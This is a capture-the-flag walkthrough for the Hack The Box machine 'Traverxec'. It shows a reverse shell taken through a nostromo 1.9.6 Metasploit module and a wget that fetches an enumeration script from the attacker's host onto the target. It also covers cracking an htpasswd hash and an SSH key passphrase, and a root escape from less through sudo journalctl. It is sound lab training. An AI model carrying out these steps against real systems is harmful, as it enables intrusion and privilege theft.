Traverxec
By: Hilbert
Enumeration
Starting with a standard nmap scan…
# Nmap 7.80 scan initiated Sat Nov 16 20:02:47 2019 as: nmap -sC -sV -p- -oN nmapscan.txt 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.083s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 16 20:04:58 2019 -- 1 IP address (1 host up) scanned in 131.07 seconds
We see nothing but 22 and 80 are open, and navigating to the webpage we don’t see much of interest
However if we run searchsploit on nostromo
root@kali:~/HTB/Boxes/Traverxec# searchsploit nostromo
We will see there is a metasploit module for remote command execution in Nostromo <= 1.9.6
Exploitation
We load metasploit and then use the nostromo exploit and set the RHOST and LHOST variables
and get a reverse shell as low privilege user www-data.
Let’s run an enumeration script. We set up a python HTTP server on our local machine where we have our enumeration scripts
root@kali:/opt/privesc# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Then run wget on the remote machine to download the script so we can run it.
www-data@traverxec:/tmp$ wget 10.10.14.7:8000/LinEnum.sh
wget 10.10.14.7:8000/LinEnum.sh
--2019-11-19 00:40:10-- http://10.10.14.7:8000/LinEnum.sh
Connecting to 10.10.14.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45656 (45K) [text/x-sh]
Saving to: 'LinEnum.sh'
LinEnum.sh 100%[===================>] 44.59K 188KB/s in 0.2s
2019-11-19 00:40:10 (188 KB/s) - 'LinEnum.sh' saved [45656/45656]
Then change mod on the script and run it
www-data@traverxec:/tmp$ chmod +x LinEnum.sh
www-data@traverxec:/tmp$ ./LinEnum.sh
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.971
[-] Debug Info
[+] Thorough tests = Disabled
Scan started at:
Tue Nov 19 00:52:42 EST 2019
If we go over the output one thing that will definitely stand out is
[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
we know that david is the user of the machine from the /etc/passwd file, and now we have a password hash belonging to him. So lets crack it! We’ll use John The Ripper and the popular wordlist “rockyou.txt”
We copy and paste the hash into a file called hash.txt and then run john like so
We now have the password “Nowonly4me”, but we’ll find that it wont work for either SSH or su’ing to david. If we dig around a little more in the /var/nostromo/conf/ folder and cat the nhttpd.conf file
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
# MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
# LOGS [OPTIONAL]
logpid logs/nhttpd.pid
# SETUID [RECOMMENDED]
user www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
We see that /home is the home directory and there is a public_www folder. If we look at /home/david/ we get permission denied, however if we look at /home/david/public_www we see some files.
www-data@traverxec:/var/nostromo/conf$ ls -la /home/david
ls -la /home/david
ls: cannot open directory '/home/david': Permission denied
www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/public_www
ls -la /home/david/public_www
total 16
drwxr-xr-x 3 david david 4096 Oct 25 15:45 .
drwx--x--x 5 david david 4096 Nov 18 23:53 ..
-rw-r--r-- 1 david david 402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area
www-data@traverxec:/var/nostromo/conf$ cd /home/david/public_www/protected-file-area
<conf$ cd /home/david/public_www/protected-file-area
www-data@traverxec:/home/david/public_www/protected-file-area$ ls -la
ls -la
total 16
drwxr-xr-x 2 david david 4096 Oct 25 17:02 .
drwxr-xr-x 3 david david 4096 Oct 25 15:45 ..
-rw-r--r-- 1 david david 45 Oct 25 15:46 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25 17:02 backup-ssh-identity-files.tgz
www-data@traverxec:/home/david/public_www/protected-file-area$
It seems can’t access the important looking backup-ssh files, however since we can read the file it’s possible for us to move it to our computer to extract it by using base64.
We simply copy the output and then paste it to a file on our computer, decode it, and then unzip as normal
If we couldn’t think of a way to access the file and got stuck, and tried looking at 10.10.10.165/david/ to no avail, as with all things when we stuck or frustrated, lets RTFM. Looking up the documentation for nostromo which we can find at http://www.nazgul.ch/dev/nostromo_man.html, we see the following
HOMEDIRS
To serve the home directories of your users via HTTP, enable the homedirs
option by defining the path in where the home directories are stored,
normally /home. To access a users home directory enter a ~ in the URL
followed by the home directory name like in this example:
http://www.nazgul.ch/~hacki/
The content of the home directory is handled exactly the same way as a
directory in your document root. If some users don't want that their
home directory can be accessed via HTTP, they shall remove the world
readable flag on their home directory and a caller will receive a 403
Forbidden response. Also, if basic authentication is enabled, a user can
create an .htaccess file in his home directory and a caller will need to
authenticate.
You can restrict the access within the home directories to a single sub
directory by defining it via the homedirs_public option.
Bingo! Trying 10.10.10.165/~david/ we are greeted with
and 10.10.10.165/~david/protected-file-area/ gets us something we can successfully enter in the credentials we found earlier
which then gives us access to the backup-ssh file
Extracting the tar file we see it’s as advertised a backup of the ssh identity files.
root@kali:~/HTB/Boxes/Traverxec# tar -xvzf backup-ssh-identity-files.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
Let’s crack the id_rsa file and then try and use it to SSH in as david. To do this first we need to convert it to a format we can use in john the ripper. We will use a python script included with john called ssh2john.py. Then we can crack the resulting file as we did the previous hash.
Now using that ssh key and the password “hunter” we SSH in as david.
root@kali:~/HTB/Boxes/Traverxec# ssh -i home/david/.ssh/id_rsa david@10.10.10.165
Enter passphrase for key 'home/david/.ssh/id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Tue Nov 19 12:44:42 2019 from 10.10.14.13
david@traverxec:~$ ls /home/david/
bin public_www user.txt
david@traverxec:~$
as we can see we now have access to the user flag
On to Root
We see a “bin” folder in the user directory, if we examine the contents we find a script named “server-stats.sh”, which if we cat shows us
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
Examining and running it we see it’s basically just outputting a header (the other file in the bin directory) and a bit of information about the server. The last line of this script is the most important. We see it is running sudo and then journalctl, this means that journalctl is running with elevated privileges so if we can can figure out a way to bend that to our will we will have root privileges. However we don’t seem to be able to change any of the arguments. When we run anything other than “sudo journalctl -n5 -unostromo.service” we are asked to supply a password.
If we look at GTFObins for journalctl (https://gtfobins.github.io/gtfobins/journalctl/) we see an important bit of information.
So journalctl is using less to write to the screen, and if we follow the link we see that we can break out of less into an interactive shell.
There may or may not be a problem here depending on how big your terminal window is. If our terminal window is large enough to display everything outputted both vertically and horizontally then less will never give us the opportunity to break out into a shell, it will just output everything like so
But if we change the size of our terminal so that it is too narrow to display the entire line
or not tall enough to display all the lines
less does what less is supposed to do, and we can then enter !/bin/bash to escape into a root shell
Or we can use the stty command to change our terminal settings. “stty rows 5” will output only 5 lines when less is used and that will also allow us the opportunity to break out into a shell. Either way we now have access to the root flag.
If you found this walkthrough helpful, please consider adding a respect to my profile, thanks.